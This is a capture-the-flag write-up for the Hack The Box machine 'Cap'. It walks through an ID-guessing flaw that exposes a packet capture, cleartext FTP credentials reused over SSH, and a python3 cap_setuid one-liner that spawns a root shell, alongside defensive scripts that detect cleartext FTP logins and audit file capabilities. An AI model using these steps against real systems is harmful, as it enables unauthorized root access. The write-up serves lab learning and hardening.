CAP CTF – HTB

This is an interesting box: judging by the machine's name, I'll have to analyze a pcap file and pull some information out of it. As always, I start with the enumeration stage.

Enumeration

nmap -sV -A -oN result.nmap 10.10.10.245
---------------------------------------
# Nmap 7.91 scan initiated Tue Jun 22 12:12:53 2021 as: nmap -sV -A -oN result.nmap2 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Tue, 22 Jun 2021 11:25:24 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Tue, 22 Jun 2021 11:25:18 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Tue, 22 Jun 2021 11:25:18 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT      ADDRESS
1   44.02 ms 10.10.14.1
2   44.06 ms 10.10.10.245

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 22 12:15:18 2021 -- 1 IP address (1 host up) scanned in 145.09 second

From the Nmap scan I see that ports 21 (FTP), 22 (SSH) and 80 (HTTP, served by gunicorn) are open. Let's check out the web server first.

Browsing to the site, I'm already logged in as the user Nathan. The dashboard shows visualisations of security events, failed login attempts and port scans.

Clicking "Security Snapshot (5 second PCAP + Analysis)" takes me to a URL of the form 10.10.10.245/data/8. The last number is a sequential ID that is not tied to the logged-in user (an insecure direct object reference), so I can change it and see whether earlier captures are accessible.

I download the pcap file and open it in Wireshark. The enumeration stage showed FTP on port 21, and FTP sends its login in cleartext, so I filter on ftp in Wireshark.

The FTP stream in Wireshark contains the USER and PASS commands, which give me a username and a password. I'll log into FTP with them.
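The same check that the Wireshark filter performs can be automated, which is how a defender would sweep stored captures to confirm that credentials are crossing the wire unencrypted. The script below is an added example, not code from the write-up: it parses a classic libpcap file (not pcapng) carrying Ethernet/IPv4/TCP frames with the standard library only and reports USER/PASS commands sent to the FTP port, redacting the password value so the report itself does not leak the secret. The sample capture is constructed inline; the client address 10.10.14.5 and the password string are placeholders, only the server address and username come from this write-up.

```python
"""Flag cleartext FTP logins in a libpcap capture (added example, not from the write-up)."""
import struct

LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = b"\x08\x00"
IPPROTO_TCP = 6


def pcap_frames(data: bytes):
    """Yield each captured frame from a classic libpcap byte string."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"          # written on a little-endian host
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a libpcap file (pcapng is not handled here)")
    if struct.unpack(endian + "I", data[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled")
    offset = 24                                  # global header is 24 bytes
    while offset + 16 <= len(data):
        _sec, _usec, incl_len, _orig = struct.unpack(endian + "IIII", data[offset:offset + 16])
        offset += 16
        yield data[offset:offset + incl_len]
        offset += incl_len


def tcp_payload(frame: bytes):
    """Return (src_ip, dst_ip, sport, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != IPPROTO_TCP or len(ip) < total_len:
        return None
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[data_off:]


def find_ftp_auth(pcap_bytes: bytes, ftp_port: int = 21):
    """Report USER/PASS commands sent to ftp_port; password values are redacted."""
    findings = []
    for frame in pcap_frames(pcap_bytes):
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        src, dst, _sport, dport, payload = parsed
        if dport != ftp_port:
            continue                             # server replies and other ports are skipped
        for line in payload.split(b"\r\n"):
            verb, _, arg = line.partition(b" ")
            if verb.upper() == b"USER":
                findings.append({"client": src, "server": dst, "command": "USER",
                                 "value": arg.decode(errors="replace")})
            elif verb.upper() == b"PASS":
                findings.append({"client": src, "server": dst, "command": "PASS",
                                 "value": f"<redacted, {len(arg)} chars>"})
    return findings


# --- constructed sample capture (not the real HTB pcap) ---------------------
def _frame(src, dst, sport, dport, payload):
    """Build a minimal Ethernet/IPv4/TCP frame; checksums are left zero, enough for parsing."""
    eth = b"\x00" * 12 + ETHERTYPE_IPV4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, IPPROTO_TCP, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    return eth + ip + tcp


def _pcap(frames):
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    records = [struct.pack("<IIII", 1624363200 + i, 0, len(f), len(f)) + f for i, f in enumerate(frames)]
    return header + b"".join(records)


CLIENT, SERVER = "10.10.14.5", "10.10.10.245"    # client address is an assumption
SAMPLE_PCAP = _pcap([
    _frame(SERVER, CLIENT, 21, 53412, b"220 (vsFTPd 3.0.3)\r\n"),
    _frame(CLIENT, SERVER, 53412, 21, b"USER nathan\r\n"),
    _frame(SERVER, CLIENT, 21, 53412, b"331 Please specify the password.\r\n"),
    _frame(CLIENT, SERVER, 53412, 21, b"PASS example-password\r\n"),   # placeholder, not the real one
    _frame(CLIENT, SERVER, 53413, 80, b"GET /data/8 HTTP/1.1\r\n\r\n"),
])

if __name__ == "__main__":
    for f in find_ftp_auth(SAMPLE_PCAP):
        print(f"{f['client']} -> {f['server']}: {f['command']} {f['value']}")
```

Run against a real capture with `find_ftp_auth(open("capture.pcap", "rb").read())`. A hit means the service should be moved to FTPS or SFTP and the exposed account's password rotated; the length-only report is deliberate so the scan results can be shared with the service owner without becoming a second copy of the credential.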

Gaining Access

ftp 10.10.10.245 
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:aghanim): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 0        1001            0 Jun 28 05:24 2
drwxr-xr-x    3 1001     1001         4096 Jun 28 08:06 snap
-r--------    1 1001     1001           33 Jun 28 03:08 user.txt
226 Directory send OK.

The first flag, user.txt, is right there in the FTP root.

The enumeration stage also showed port 22 open, so I try the same username and password over SSH in case the credentials are reused.

ssh nathan@10.10.10.245 
nathan@10.10.10.245's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

Last login: Mon Jun 28 09:55:58 2021 from 10.10.14.55

nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)

Privilege Escalation

Now I check whether the user has sudo rights, and look for SUID binaries and file capabilities that could let me escalate privileges.

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
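A getcap listing like the one above is something a periodic host audit should parse rather than a person eyeball. The following is an added example, not code from the write-up or from GTFOBins: a small Python audit that reads `getcap -r /` output (both the older `path = caps+flags` layout shown here and the newer `path caps+flags` layout of recent libcap), and flags capabilities that amount to root when granted to a binary any user can execute. The ROOT_EQUIVALENT table and the interpreter heuristic are my own selections; the sample input is the listing from this write-up.

```python
"""Audit `getcap -r /` output for root-equivalent file capabilities (added example, not from the write-up)."""
import re

# Capabilities that, on a binary an ordinary user can run, are effectively root.
# This selection is the example author's reading of capabilities(7), not from the write-up.
ROOT_EQUIVALENT = {
    "cap_setuid": "process can switch to uid 0",
    "cap_setgid": "process can switch to any group, including root's",
    "cap_sys_admin": "mount, namespace and many other administrative operations",
    "cap_dac_override": "bypass file read/write/execute permission checks",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow",
    "cap_sys_ptrace": "attach to and tamper with root-owned processes",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "change ownership of any file",
    "cap_fowner": "bypass permission checks that require file ownership",
}
# On an interpreter the capability becomes an arbitrary-code primitive, so rate it higher.
INTERPRETERS = ("python", "perl", "ruby", "node", "php", "lua")

# One clause of the libcap text format: "cap_a,cap_b+eip" (op may be +, = or -).
CLAUSE = re.compile(r"^(?P<caps>[a-z0-9_,]+)(?P<op>[+=-])(?P<flags>[eip]*)$")


def parse_getcap(output: str):
    """Parse getcap output into [(path, [capabilities], flags)], one tuple per clause.

    Accepts 'path = clause ...' (libcap before 2.41) and 'path clause ...' (newer).
    Paths containing spaces are not handled; getcap itself prints them ambiguously.
    """
    entries = []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        rest = rest.lstrip("= ").strip()
        for clause in rest.split():
            m = CLAUSE.match(clause)
            if not m or m.group("op") == "-":      # a '-' clause drops capabilities
                continue
            entries.append((path, m.group("caps").split(","), m.group("flags")))
    return entries


def audit_capabilities(output: str):
    """Return findings for root-equivalent capabilities in the permitted set."""
    findings = []
    for path, caps, flags in parse_getcap(output):
        name = path.rsplit("/", 1)[-1]
        for cap in caps:
            if cap in ROOT_EQUIVALENT and "p" in flags:
                findings.append({
                    "path": path,
                    "capability": cap,
                    "effective": "e" in flags,         # 'e' means it applies at exec without code support
                    "severity": "critical" if name.startswith(INTERPRETERS) else "high",
                    "reason": ROOT_EQUIVALENT[cap],
                    "remediation": f"setcap -r {path}",  # then re-grant only what the program needs
                })
    return findings


# Sample input: the getcap listing from this write-up.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

if __name__ == "__main__":
    for f in audit_capabilities(SAMPLE_GETCAP):
        print(f"[{f['severity']}] {f['path']}: {f['capability']} ({f['reason']}); fix: {f['remediation']}")
```

Only the python3.8 entry is flagged, and as critical: ping with cap_net_raw is what file capabilities are for, a fixed-purpose binary that needs one privilege, while an interpreter with cap_setuid lets any script that runs under it become root. The likely intent here was cap_net_bind_service so the web app could bind port 80; cap_setuid is the excess grant, and the fix is to remove it (or serve behind a reverse proxy and drop both).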

From gtfobins.github.io: If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

So I adapt the GTFOBins one-liner (./python -c 'import os; os.setuid(0); os.system("/bin/sh")') to the system's python3, which is the binary carrying cap_setuid:
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
# ls -la /root                                               
total 36
drwx------  6 root root 4096 May 27 09:16 .
drwxr-xr-x 20 root root 4096 Jun  1 10:09 ..
lrwxrwxrwx  1 root root    9 May 15 21:40 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4096 May 23 19:17 .cache
drwxr-xr-x  3 root root 4096 May 23 19:17 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwx------  2 root root 4096 May 23 19:17 .ssh
lrwxrwxrwx  1 root root    9 May 27 09:16 .viminfo -> /dev/null
-r--------  1 root root   33 Jun 28 03:08 root.txt
drwxr-xr-x  3 root root 4096 May 23 19:17 snap
# 
